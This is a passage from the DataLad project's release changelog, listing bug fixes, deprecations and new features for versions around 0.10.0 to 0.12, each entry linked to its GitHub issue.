(`#3318 <https://github.com/datalad/datalad/issues/3318>`__)\n\n - Siblings are no longer configured with a post-update hook unless a\n web interface is requested with ``--ui``.\n - ``git submodule update --init`` is no longer called from the\n post-update hook.\n - If ``--inherit`` is given for a dataset without a superdataset, a\n warning is now given instead of raising an error.\n\n- The internal command runner failed on Python 2 when its ``env``\n argument had unicode values.\n (`#3332 <https://github.com/datalad/datalad/issues/3332>`__)\n- The safeguard that prevents creating a dataset in a subdirectory that\n already contains tracked files for another repository failed on Git\n versions before 2.14. For older Git versions, we now warn the caller\n that the safeguard is not active.\n (`#3347 <https://github.com/datalad/datalad/issues/3347>`__)\n- A regression introduced in v0.11.1 prevented\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n from committing changes under a subdirectory when the subdirectory\n was specified as a path argument.\n (`#3106 <https://github.com/datalad/datalad/issues/3106>`__)\n- A workaround introduced in v0.11.1 made it possible for\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n to do a partial commit with an annex file that has gone below the\n ``annex.largefiles`` threshold. The logic of this workaround was\n faulty, leading to files being displayed as typechanged in the index\n following the commit.\n (`#3365 <https://github.com/datalad/datalad/issues/3365>`__)\n- The resolve_path() helper confused paths that had a semicolon for SSH\n RIs. (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n- The detection of SSH RIs has been improved.\n (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n\n.. _enhancements-and-new-features-29:\n\nEnhancements and new features\n-----------------------------\n\n- The internal command runner was too aggressive in its decision to\n sleep. (`#3322 <https://github.com/datalad/datalad/issues/3322>`__)\n- The “INFO” label in log messages now retains the default text color\n for the terminal rather than using white, which only worked well for\n terminals with dark backgrounds.\n (`#3334 <https://github.com/datalad/datalad/issues/3334>`__)\n- A short flag ``-R`` is now available for the ``--recursion-limit``\n flag, a flag shared by several subcommands.\n (`#3340 <https://github.com/datalad/datalad/issues/3340>`__)\n- The authentication logic for\n `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n has been revamped and now supports 2FA.\n (`#3180 <https://github.com/datalad/datalad/issues/3180>`__)\n- New configuration option ``datalad.ui.progressbar`` can be used to\n configure the default backend for progress reporting (“none”, for\n example, results in no progress bars being shown).\n (`#3396 <https://github.com/datalad/datalad/issues/3396>`__)\n- A new progress backend, available by setting datalad.ui.progressbar\n to “log”, replaces progress bars with a log message upon completion\n of an action.\n (`#3396 <https://github.com/datalad/datalad/issues/3396>`__)\n- DataLad learned to consult the `NO_COLOR <https://no-color.org/>`__\n environment variable and the new ``datalad.ui.color`` configuration\n option when deciding to color output. The default value, “auto”,\n retains the current behavior of coloring output if attached to a TTY\n (`#3407 <https://github.com/datalad/datalad/issues/3407>`__).\n- `clean <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html>`__\n now removes annex transfer directories, which is useful for cleaning\n up failed downloads.\n (`#3374 <https://github.com/datalad/datalad/issues/3374>`__)\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n no longer refuses to clone into a local path that looks like a URL,\n making its behavior consistent with ``git clone``.\n (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n\n - Learned to fall back to the ``dist`` package if ``platform.dist``,\n which has been removed in the yet-to-be-release Python 3.8, does\n not exist.\n (`#3439 <https://github.com/datalad/datalad/issues/3439>`__)\n - Gained a ``--section`` option for limiting the output to specific\n sections and a ``--decor`` option, which currently knows how to\n format the output as GitHub’s ``<details>`` section.\n (`#3440 <https://github.com/datalad/datalad/issues/3440>`__)\n\n0.11.4 (Mar 18, 2019) – get-ready\n=================================\n\nLargely a bug fix release with a few enhancements\n\nImportant\n---------\n\n- 0.11.x series will be the last one with support for direct mode of\n `git-annex <http://git-annex.branchable.com/>`__ which is used on\n crippled (no symlinks and no locking) filesystems. v7 repositories\n should be used instead.\n\n.. _fixes-30:\n\nFixes\n-----\n\n- Extraction of .gz files is broken without p7zip installed. We now\n abort with an informative error in this situation.\n (`#3176 <https://github.com/datalad/datalad/issues/3176>`__)\n\n- Committing failed in some cases because we didn’t ensure that the\n path passed to ``git read-tree --index-output=...`` resided on the\n same filesystem as the repository.\n (`#3181 <https://github.com/datalad/datalad/issues/3181>`__)\n\n- Some pointless warnings during metadata aggregation have been\n eliminated.\n (`#3186 <https://github.com/datalad/datalad/issues/3186>`__)\n\n- With Python 3 the LORIS token authenticator did not properly decode a\n response\n (`#3205 <https://github.com/datalad/datalad/issues/3205>`__).\n\n- With Python 3 downloaders unnecessarily decoded the response when\n getting the status, leading to an encoding error.\n (`#3210 <https://github.com/datalad/datalad/issues/3210>`__)\n\n- In some cases, our internal command Runner did not adjust the\n environment’s ``PWD`` to match the current working directory\n specified with the ``cwd`` parameter.\n (`#3215 <https://github.com/datalad/datalad/issues/3215>`__)\n\n- The specification of the pyliblzma dependency was broken.\n (`#3220 <https://github.com/datalad/datalad/issues/3220>`__)\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n displayed an uninformative blank log message in some cases.\n (`#3222 <https://github.com/datalad/datalad/issues/3222>`__)\n\n- The logic for finding the location of the aggregate metadata DB\n anchored the search path incorrectly, leading to a spurious warning.\n (`#3241 <https://github.com/datalad/datalad/issues/3241>`__)\n\n- Some progress bars were still displayed when stdout and stderr were\n not attached to a tty.\n (`#3281 <https://github.com/datalad/datalad/issues/3281>`__)\n\n- Check for stdin/out/err to not be closed before checking for\n ``.isatty``.\n (`#3268 <https://github.com/datalad/datalad/issues/3268>`__)\n\n.. _enhancements-and-new-features-30:\n\nEnhancements and new features\n-----------------------------\n\n- Creating a new repository now aborts if any of the files in the\n directory are tracked by a repository in a parent directory.\n (`#3211 <https://github.com/datalad/datalad/issues/3211>`__)\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n learned to replace the ``{tmpdir}`` placeholder in commands with a\n temporary directory.\n (`#3223 <https://github.com/datalad/datalad/issues/3223>`__)\n\n- `duecredit <https://github.com/duecredit/duecredit>`__ support has\n been added for citing DataLad itself as well as datasets that an\n analysis uses.\n (`#3184 <https://github.com/datalad/datalad/issues/3184>`__)\n\n- The ``eval_results`` interface helper unintentionally modified one of\n its arguments.\n (`#3249 <https://github.com/datalad/datalad/issues/3249>`__)\n\n- A few DataLad constants have been added, changed, or renamed\n (`#3250 <https://github.com/datalad/datalad/issues/3250>`__):\n\n - ``HANDLE_META_DIR`` is now ``DATALAD_DOTDIR``. The old name should\n be considered deprecated.\n - ``METADATA_DIR`` now refers to ``DATALAD_DOTDIR/metadata`` rather\n than ``DATALAD_DOTDIR/meta`` (which is still available as\n ``OLDMETADATA_DIR``).\n - The new ``DATASET_METADATA_FILE`` refers to\n ``METADATA_DIR/dataset.json``.\n - The new ``DATASET_CONFIG_FILE`` refers to\n ``DATALAD_DOTDIR/config``.\n - ``METADATA_FILENAME`` has been renamed to\n ``OLDMETADATA_FILENAME``.\n\n0.11.3 (Feb 19, 2019) – read-me-gently\n======================================\n\nJust a few of important fixes and minor enhancements.\n\n.. _fixes-31:\n\nFixes\n-----\n\n- The logic for setting the maximum command line length now works\n around Python 3.4 returning an unreasonably high value for\n ``SC_ARG_MAX`` on Debian systems.\n (`#3165 <https://github.com/datalad/datalad/issues/3165>`__)\n\n- DataLad commands that are conceptually “read-only”, such as\n ``datalad ls -L``, can fail when the caller lacks write permissions\n because git-annex tries merging remote git-annex branches to update\n information about availability. DataLad now disables\n ``annex.merge-annex-branches`` in some common “read-only” scenarios\n to avoid these failures.\n (`#3164 <https://github.com/datalad/datalad/issues/3164>`__)\n\n.. _enhancements-and-new-features-31:\n\nEnhancements and new features\n-----------------------------\n\n- Accessing an “unbound” dataset method now automatically imports the\n necessary module rather than requiring an explicit import from the\n Python caller. For example, calling ``Dataset.add`` no longer needs\n to be preceded by ``from datalad.distribution.add import Add`` or an\n import of ``datalad.api``.\n (`#3156 <https://github.com/datalad/datalad/issues/3156>`__)\n\n- Configuring the new variable ``datalad.ssh.identityfile`` instructs\n DataLad to pass a value to the ``-i`` option of ``ssh``.\n (`#3149 <https://github.com/datalad/datalad/issues/3149>`__)\n (`#3168 <https://github.com/datalad/datalad/issues/3168>`__)\n\n0.11.2 (Feb 07, 2019) – live-long-and-prosper\n=============================================\n\nA variety of bugfixes and enhancements\n\n.. _major-refactoring-and-deprecations-10:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- All extracted metadata is now placed under git-annex by default.\n Previously files smaller than 20 kb were stored in git.\n (`#3109 <https://github.com/datalad/datalad/issues/3109>`__)\n- The function ``datalad.cmd.get_runner`` has been removed.\n (`#3104 <https://github.com/datalad/datalad/issues/3104>`__)\n\n.. _fixes-32:\n\nFixes\n-----\n\n- Improved handling of long commands:\n\n - The code that inspected ``SC_ARG_MAX`` didn’t check that the\n reported value was a sensible, positive number.\n (`#3025 <https://github.com/datalad/datalad/issues/3025>`__)\n - More commands that invoke ``git`` and ``git-annex`` with file\n arguments learned to split up the command calls when it is likely\n that the command would fail due to exceeding the maximum supported\n length.\n (`#3138 <https://github.com/datalad/datalad/issues/3138>`__)\n\n- The ``setup_yoda_dataset`` procedure created a malformed\n .gitattributes line.\n (`#3057 <https://github.com/datalad/datalad/issues/3057>`__)\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n unnecessarily tried to infer the dataset when ``--no-save`` was\n given. (`#3029 <https://github.com/datalad/datalad/issues/3029>`__)\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n aborted too late and with a confusing message when a ref specified\n via ``--onto`` didn’t exist.\n (`#3019 <https://github.com/datalad/datalad/issues/3019>`__)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__:\n\n - ``run`` didn’t preserve the current directory prefix (“./”) on\n inputs and outputs, which is problematic if the caller relies on\n this representation when formatting the command.\n (`#3037 <https://github.com/datalad/datalad/issues/3037>`__)\n - Fixed a number of unicode py2-compatibility issues.\n (`#3035 <https://github.com/datalad/datalad/issues/3035>`__)\n (`#3046 <https://github.com/datalad/datalad/issues/3046>`__)\n - To proceed with a failed command, the user was confusingly\n instructed to use ``save`` instead of ``add`` even though ``run``\n uses ``add`` underneath.\n (`#3080 <https://github.com/datalad/datalad/issues/3080>`__)\n\n- Fixed a case where the helper class for checking external modules\n incorrectly reported a module as unknown.\n (`#3051 <https://github.com/datalad/datalad/issues/3051>`__)\n- `add-archive-content <https://datalad.readthedocs.io/en/latest/generated/man/datalad-add-archive-content.html>`__\n mishandled the archive path when the leading path contained a\n symlink. (`#3058 <https://github.com/datalad/datalad/issues/3058>`__)\n- Following denied access, the credential code failed to consider a\n scenario, leading to a type error rather than an appropriate error\n message. (`#3091 <https://github.com/datalad/datalad/issues/3091>`__)\n- Some tests failed when executed from a ``git worktree`` checkout of\n the source repository.\n (`#3129 <https://github.com/datalad/datalad/issues/3129>`__)\n- During metadata extraction, batched annex processes weren’t properly\n terminated, leading to issues on Windows.\n (`#3137 <https://github.com/datalad/datalad/issues/3137>`__)\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n incorrectly handled an “invalid repository” exception when trying to\n add a submodule.\n (`#3141 <https://github.com/datalad/datalad/issues/3141>`__)\n- Pass ``GIT_SSH_VARIANT=ssh`` to git processes to be able to specify\n alternative ports in SSH urls\n\n.. _enhancements-and-new-features-32:\n\nEnhancements and new features\n-----------------------------\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n learned to suggest closely matching keys if there are no hits.\n (`#3089 <https://github.com/datalad/datalad/issues/3089>`__)\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n\n - gained a ``--group`` option so that the caller can specify the\n file system group for the repository.\n (`#3098 <https://github.com/datalad/datalad/issues/3098>`__)\n - now understands SSH URLs that have a port in them (i.e. the\n “ssh://[user@]host.xz[:port]/path/to/repo.git/” syntax mentioned\n in ``man git-fetch``).\n (`#3146 <https://github.com/datalad/datalad/issues/3146>`__)\n\n- Interface classes can now override the default renderer for\n summarizing results.\n (`#3061 <https://github.com/datalad/datalad/issues/3061>`__)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__:\n\n - ``--input`` and ``--output`` can now be shortened to ``-i`` and\n ``-o``.\n (`#3066 <https://github.com/datalad/datalad/issues/3066>`__)\n - Placeholders such as “{inputs}” are now expanded in the command\n that is shown in the commit message subject.\n (`#3065 <https://github.com/datalad/datalad/issues/3065>`__)\n - ``interface.run.run_command`` gained an ``extra_inputs`` argument\n so that wrappers like\n `datalad-container <https://github.com/datalad/datalad-container>`__\n can specify additional inputs that aren’t considered when\n formatting the command string.\n (`#3038 <https://github.com/datalad/datalad/issues/3038>`__)\n - “–” can now be used to separate options for ``run`` and those for\n the command in ambiguous cases.\n (`#3119 <https://github.com/datalad/datalad/issues/3119>`__)\n\n- The utilities ``create_tree`` and ``ok_file_has_content`` now support\n “.gz” files.\n (`#3049 <https://github.com/datalad/datalad/issues/3049>`__)\n- The Singularity container for 0.11.1 now uses\n `nd_freeze <https://github.com/neurodebian/neurodebian/blob/master/tools/nd_freeze>`__\n to make its builds reproducible.\n- A\n `publications <https://datalad.readthedocs.io/en/latest/publications.html>`__\n page has been added to the documentation.\n (`#3099 <https://github.com/datalad/datalad/issues/3099>`__)\n- ``GitRepo.set_gitattributes`` now accepts a ``mode`` argument that\n controls whether the .gitattributes file is appended to (default) or\n overwritten.\n (`#3115 <https://github.com/datalad/datalad/issues/3115>`__)\n- ``datalad --help`` now avoids using ``man`` so that the list of\n subcommands is shown.\n (`#3124 <https://github.com/datalad/datalad/issues/3124>`__)\n\n0.11.1 (Nov 26, 2018) – v7-better-than-v6\n=========================================\n\nRushed out bugfix release to stay fully compatible with recent\n`git-annex <http://git-annex.branchable.com/>`__ which introduced v7 to\nreplace v6.\n\n.. _fixes-33:\n\nFixes\n-----\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__:\n be able to install recursively into a dataset\n (`#2982 <https://github.com/datalad/datalad/issues/2982>`__)\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__:\n be able to commit/save changes whenever files potentially could have\n swapped their storage between git and annex\n (`#1651 <https://github.com/datalad/datalad/issues/1651>`__)\n (`#2752 <https://github.com/datalad/datalad/issues/2752>`__)\n (`#3009 <https://github.com/datalad/datalad/issues/3009>`__)\n- [aggregate-metadata][]:\n\n - dataset’s itself is now not “aggregated” if specific paths are\n provided for aggregation\n (`#3002 <https://github.com/datalad/datalad/issues/3002>`__). That\n resolves the issue of ``-r`` invocation aggregating all\n subdatasets of the specified dataset as well\n - also compare/verify the actual content checksum of aggregated\n metadata while considering subdataset metadata for re-aggregation\n (`#3007 <https://github.com/datalad/datalad/issues/3007>`__)\n\n- ``annex`` commands are now chunked assuming 50% “safety margin” on\n the maximal command line length. Should resolve crashes while\n operating of too many files at ones\n (`#3001 <https://github.com/datalad/datalad/issues/3001>`__)\n- ``run`` sidecar config processing\n (`#2991 <https://github.com/datalad/datalad/issues/2991>`__)\n- no double trailing period in docs\n (`#2984 <https://github.com/datalad/datalad/issues/2984>`__)\n- correct identification of the repository with symlinks in the paths\n in the tests\n (`#2972 <https://github.com/datalad/datalad/issues/2972>`__)\n- re-evaluation of dataset properties in case of dataset changes\n (`#2946 <https://github.com/datalad/datalad/issues/2946>`__)\n- [text2git][] procedure to use ``ds.repo.set_gitattributes``\n (`#2974 <https://github.com/datalad/datalad/issues/2974>`__)\n (`#2954 <https://github.com/datalad/datalad/issues/2954>`__)\n- Switch to use plain ``os.getcwd()`` if inconsistency with env var\n ``$PWD`` is detected\n (`#2914 <https://github.com/datalad/datalad/issues/2914>`__)\n- Make sure that credential defined in env var takes precedence\n (`#2960 <https://github.com/datalad/datalad/issues/2960>`__)\n (`#2950 <https://github.com/datalad/datalad/issues/2950>`__)\n\n.. _enhancements-and-new-features-33:\n\nEnhancements and new features\n-----------------------------\n\n- `shub://datalad/datalad:git-annex-dev <https://singularity-hub.org/containers/5663/view>`__\n provides a Debian buster Singularity image with build environment for\n `git-annex <http://git-annex.branchable.com/>`__.\n ``tools/bisect-git-annex`` provides a helper for running\n ``git bisect`` on git-annex using that Singularity container\n (`#2995 <https://github.com/datalad/datalad/issues/2995>`__)\n- Added ``.zenodo.json`` for better integration with Zenodo for\n citation\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n now provides names and help messages with a custom renderer for\n (`#2993 <https://github.com/datalad/datalad/issues/2993>`__)\n- Documentation: point to\n `datalad-revolution <http://github.com/datalad/datalad-revolution>`__\n extension (prototype of the greater DataLad future)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n\n - support injecting of a detached command\n (`#2937 <https://github.com/datalad/datalad/issues/2937>`__)\n\n- ``annex`` metadata extractor now extracts ``annex.key`` metadata\n record. Should allow now to identify uses of specific files etc\n (`#2952 <https://github.com/datalad/datalad/issues/2952>`__)\n- Test that we can install from http://datasets.datalad.org\n- Proper rendering of ``CommandError`` (e.g. in case of “out of space”\n error) (`#2958 <https://github.com/datalad/datalad/issues/2958>`__)\n\n0.11.0 (Oct 23, 2018) – Soon-to-be-perfect\n==========================================\n\n`git-annex <http://git-annex.branchable.com/>`__ 6.20180913 (or later)\nis now required - provides a number of fixes for v6 mode operations etc.\n\n.. _major-refactoring-and-deprecations-11:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- ``datalad.consts.LOCAL_CENTRAL_PATH`` constant was deprecated in\n favor of ``datalad.locations.default-dataset``\n `configuration <http://docs.datalad.org/en/latest/config.html>`__\n variable (`#2835 <https://github.com/datalad/datalad/issues/2835>`__)\n\nMinor refactoring\n-----------------\n\n- ``\"notneeded\"`` messages are no longer reported by default results\n renderer\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n no longer shows commit instructions upon command failure when\n ``explicit`` is true and no outputs are specified\n (`#2922 <https://github.com/datalad/datalad/issues/2922>`__)\n- ``get_git_dir`` moved into GitRepo\n (`#2886 <https://github.com/datalad/datalad/issues/2886>`__)\n- ``_gitpy_custom_call`` removed from GitRepo\n (`#2894 <https://github.com/datalad/datalad/issues/2894>`__)\n- ``GitRepo.get_merge_base`` argument is now called ``commitishes``\n instead of ``treeishes``\n (`#2903 <https://github.com/datalad/datalad/issues/2903>`__)\n\n.. _fixes-34:\n\nFixes\n-----\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n should not leave the dataset in non-clean state\n (`#2858 <https://github.com/datalad/datalad/issues/2858>`__) and some\n other enhancements\n (`#2859 <https://github.com/datalad/datalad/issues/2859>`__)\n- Fixed chunking of the long command lines to account for decorators\n and other arguments\n (`#2864 <https://github.com/datalad/datalad/issues/2864>`__)\n- Progress bar should not crash the process on some missing progress\n information\n (`#2891 <https://github.com/datalad/datalad/issues/2891>`__)\n- Default value for ``jobs`` set to be ``\"auto\"`` (not ``None``) to\n take advantage of possible parallel get if in ``-g`` mode\n (`#2861 <https://github.com/datalad/datalad/issues/2861>`__)\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n must not crash if ``git-annex`` is not installed etc\n (`#2865 <https://github.com/datalad/datalad/issues/2865>`__),\n (`#2865 <https://github.com/datalad/datalad/issues/2865>`__),\n (`#2918 <https://github.com/datalad/datalad/issues/2918>`__),\n (`#2917 <https://github.com/datalad/datalad/issues/2917>`__)\n- Fixed paths (with spaces etc) handling while reporting annex error\n output (`#2892 <https://github.com/datalad/datalad/issues/2892>`__),\n (`#2893 <https://github.com/datalad/datalad/issues/2893>`__)\n- ``__del__`` should not access ``.repo`` but ``._repo`` to avoid\n attempts for reinstantiation etc\n (`#2901 <https://github.com/datalad/datalad/issues/2901>`__)\n- Fix up submodule ``.git`` right in ``GitRepo.add_submodule`` to avoid\n added submodules being non git-annex friendly\n (`#2909 <https://github.com/datalad/datalad/issues/2909>`__),\n (`#2904 <https://github.com/datalad/datalad/issues/2904>`__)\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n (`#2905 <https://github.com/datalad/datalad/issues/2905>`__)\n\n - now will provide dataset into the procedure if called within\n dataset\n - will not crash if procedure is an executable without ``.py`` or\n ``.sh`` suffixes\n\n- Use centralized ``.gitattributes`` handling while setting annex\n backend (`#2912 <https://github.com/datalad/datalad/issues/2912>`__)\n- ``GlobbedPaths.expand(..., full=True)`` incorrectly returned relative\n paths when called more than once\n (`#2921 <https://github.com/datalad/datalad/issues/2921>`__)\n\n.. _enhancements-and-new-features-34:\n\nEnhancements and new features\n-----------------------------\n\n- Report progress on\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n when installing from “smart” git servers\n (`#2876 <https://github.com/datalad/datalad/issues/2876>`__)\n- Stale/unused ``sth_like_file_has_content`` was removed\n (`#2860 <https://github.com/datalad/datalad/issues/2860>`__)\n- Enhancements to\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n to operate on “improved” metadata layouts\n (`#2878 <https://github.com/datalad/datalad/issues/2878>`__)\n- Output of ``git annex init`` operation is now logged\n (`#2881 <https://github.com/datalad/datalad/issues/2881>`__)\n- New\n\n - ``GitRepo.cherry_pick``\n (`#2900 <https://github.com/datalad/datalad/issues/2900>`__)\n - ``GitRepo.format_commit``\n (`#2902 <https://github.com/datalad/datalad/issues/2902>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n (`#2905 <https://github.com/datalad/datalad/issues/2905>`__)\n\n - procedures can now recursively be discovered in subdatasets as\n well. The uppermost has highest priority\n - Procedures in user and system locations now take precedence over\n those in datasets.\n\n0.10.3.1 (Sep 13, 2018) – Nothing-is-perfect\n============================================\n\nEmergency bugfix to address forgotten boost of version in\n``datalad/version.py``.\n\n0.10.3 (Sep 13, 2018) – Almost-perfect\n======================================\n\nThis is largely a bugfix release which addressed many (but not yet all)\nissues of working with git-annex direct and version 6 modes, and\noperation on Windows in general. Among enhancements you will see the\nsupport of public S3 buckets (even with periods in their names), ability\nto configure new providers interactively, and improved ``egrep`` search\nbackend.\n\nAlthough we do not require with this release, it is recommended to make\nsure that you are using a recent ``git-annex`` since it also had a\nvariety of fixes and enhancements in the past months.\n\n.. _fixes-35:\n\nFixes\n-----\n\n- Parsing of combined short options has been broken since DataLad\n v0.10.0. (`#2710 <https://github.com/datalad/datalad/issues/2710>`__)\n- The ``datalad save`` instructions shown by ``datalad run`` for a\n command with a non-zero exit were incorrectly formatted.\n (`#2692 <https://github.com/datalad/datalad/issues/2692>`__)\n- Decompression of zip files (e.g., through\n ``datalad add-archive-content``) failed on Python 3.\n (`#2702 <https://github.com/datalad/datalad/issues/2702>`__)\n- Windows:\n\n - colored log output was not being processed by colorama.\n (`#2707 <https://github.com/datalad/datalad/issues/2707>`__)\n - more codepaths now try multiple times when removing a file to deal\n with latency and locking issues on Windows.\n (`#2795 <https://github.com/datalad/datalad/issues/2795>`__)\n\n- Internal git fetch calls have been updated to work around a GitPython\n ``BadName`` issue.\n (`#2712 <https://github.com/datalad/datalad/issues/2712>`__),\n (`#2794 <https://github.com/datalad/datalad/issues/2794>`__)\n- The progress bar for annex file transferring was unable to handle an\n empty file.\n (`#2717 <https://github.com/datalad/datalad/issues/2717>`__)\n- ``datalad add-readme`` halted when no aggregated metadata was found\n rather than displaying a warning.\n (`#2731 <https://github.com/datalad/datalad/issues/2731>`__)\n- ``datalad rerun`` failed if ``--onto`` was specified and the history\n contained no run commits.\n (`#2761 <https://github.com/datalad/datalad/issues/2761>`__)\n- Processing of a command’s results failed on a result record with a\n missing value (e.g., absent field or subfield in metadata). Now the\n missing value is rendered as “N/A”.\n (`#2725 <https://github.com/datalad/datalad/issues/2725>`__).\n- A couple of documentation links in the “Delineation from related\n solutions” were misformatted.\n (`#2773 <https://github.com/datalad/datalad/issues/2773>`__)\n- With the latest git-annex, several known V6 failures are no longer an\n issue. (`#2777 <https://github.com/datalad/datalad/issues/2777>`__)\n- In direct mode, commit changes would often commit annexed content as\n regular Git files. A new approach fixes this and resolves a good\n number of known failures.\n (`#2770 <https://github.com/datalad/datalad/issues/2770>`__)\n- The reporting of command results failed if the current working\n directory was removed (e.g., after an unsuccessful ``install``).\n (`#2788 <https://github.com/datalad/datalad/issues/2788>`__)\n- When installing into an existing empty directory, ``datalad install``\n removed the directory after a failed clone.\n (`#2788 <https://github.com/datalad/datalad/issues/2788>`__)\n- ``datalad run`` incorrectly handled inputs and outputs for paths with\n spaces and other characters that require shell escaping.\n (`#2798 <https://github.com/datalad/datalad/issues/2798>`__)\n- Globbing inputs and outputs for ``datalad run`` didn’t work correctly\n if a subdataset wasn’t installed.\n (`#2796 <https://github.com/datalad/datalad/issues/2796>`__)\n- Minor (in)compatibility with git 2.19 - (no) trailing period in an\n error message now.\n (`#2815 <https://github.com/datalad/datalad/issues/2815>`__)\n\n.. _enhancements-and-new-features-35:\n\nEnhancements and new features\n-----------------------------\n\n- Anonymous access is now supported for S3 and other downloaders.\n (`#2708 <https://github.com/datalad/datalad/issues/2708>`__)\n- A new interface is available to ease setting up new providers.\n (`#2708 <https://github.com/datalad/datalad/issues/2708>`__)\n- Metadata: changes to egrep mode search\n (`#2735 <https://github.com/datalad/datalad/issues/2735>`__)\n\n - Queries in egrep mode are now case-sensitive when the query\n contains any uppercase letters and are case-insensitive otherwise.\n The new mode egrepcs can be used to perform a case-sensitive query\n with all lower-case letters.\n - Search can now be limited to a specific key.\n - Multiple queries (list of expressions) are evaluated using AND to\n determine whether something is a hit.\n - A single multi-field query (e.g., ``pa*:findme``) is a hit, when\n any matching field matches the query.\n - All matching key/value combinations across all (multi-field)\n queries are reported in the query_matched result field.\n - egrep mode now shows all hits rather than limiting the results to\n the top 20 hits.\n\n- The documentation on how to format commands for ``datalad run`` has\n been improved.\n (`#2703 <https://github.com/datalad/datalad/issues/2703>`__)\n- The method for determining the current working directory on Windows\n has been improved.\n (`#2707 <https://github.com/datalad/datalad/issues/2707>`__)\n- ``datalad --version`` now simply shows the version without the\n license. (`#2733 <https://github.com/datalad/datalad/issues/2733>`__)\n- ``datalad export-archive`` learned to export under an existing\n directory via its ``--filename`` option.\n (`#2723 <https://github.com/datalad/datalad/issues/2723>`__)\n- ``datalad export-to-figshare`` now generates the zip archive in the\n root of the dataset unless ``--filename`` is specified.\n (`#2723 <https://github.com/datalad/datalad/issues/2723>`__)\n- After importing ``datalad.api``, ``help(datalad.api)`` (or\n ``datalad.api?`` in IPython) now shows a summary of the available\n DataLad commands.\n (`#2728 <https://github.com/datalad/datalad/issues/2728>`__)\n- Support for using ``datalad`` from IPython has been improved.\n (`#2722 <https://github.com/datalad/datalad/issues/2722>`__)\n- ``datalad wtf`` now returns structured data and reports the version\n of each extension.\n (`#2741 <https://github.com/datalad/datalad/issues/2741>`__)\n- The internal handling of gitattributes information has been improved.\n A user-visible consequence is that ``datalad create --force`` no\n longer duplicates existing attributes.\n (`#2744 <https://github.com/datalad/datalad/issues/2744>`__)\n- The “annex” metadata extractor can now be used even when no content\n is present.\n (`#2724 <https://github.com/datalad/datalad/issues/2724>`__)\n- The ``add_url_to_file`` method (called by commands like\n ``datalad download-url`` and ``datalad add-archive-content``)\n learned how to display a progress bar.\n (`#2738 <https://github.com/datalad/datalad/issues/2738>`__)\n\n0.10.2 (Jul 09, 2018) – Thesecuriestever\n========================================\n\nPrimarily a bugfix release to accommodate recent git-annex release\nforbidding file:// and http://localhost/ URLs which might lead to\nrevealing private files if annex is publicly shared.\n\n.. _fixes-36:\n\nFixes\n-----\n\n- fixed testing to be compatible with recent git-annex (6.20180626)\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n will now download to current directory instead of the top of the\n dataset\n\n.. _enhancements-and-new-features-36:\n\nEnhancements and new features\n-----------------------------\n\n- do not quote ~ in URLs to be consistent with quote implementation in\n Python 3.7 which now follows RFC 3986\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n support for user-configured placeholder values\n- documentation on native git-annex metadata support\n- handle 401 errors from LORIS tokens\n- ``yoda`` procedure will instantiate ``README.md``\n- ``--discover`` option added to\n `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n to list available procedures\n\n0.10.1 (Jun 17, 2018) – OHBM polish\n===================================\n\nThe is a minor bugfix release.\n\n.. _fixes-37:\n\nFixes\n-----\n\n- Be able to use backports.lzma as a drop-in replacement for pyliblzma.\n- Give help when not specifying a procedure name in ``run-procedure``.\n- Abort early when a downloader received no filename.\n- Avoid ``rerun`` error when trying to unlock non-available files.\n\n0.10.0 (Jun 09, 2018) – The Release\n===================================\n\nThis release is a major leap forward in metadata support.\n\n.. _major-refactoring-and-deprecations-12:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Metadata\n\n - Prior metadata provided by datasets under ``.datalad/meta`` is no\n longer used or supported. Metadata must be reaggregated using 0.10\n version\n - Metadata extractor types are no longer auto-guessed and must be\n explicitly specified in ``datalad.metadata.nativetype`` config\n (could contain multiple values)\n - Metadata aggregation of a dataset hierarchy no longer updates all\n datasets in the tree with new metadata. Instead, only the target\n dataset is updated. This behavior can be changed via the\n –update-mode switch. The new default prevents needless\n modification of (3rd-party) subdatasets.\n - Neuroimaging metadata support has been moved into a dedicated\n extension: 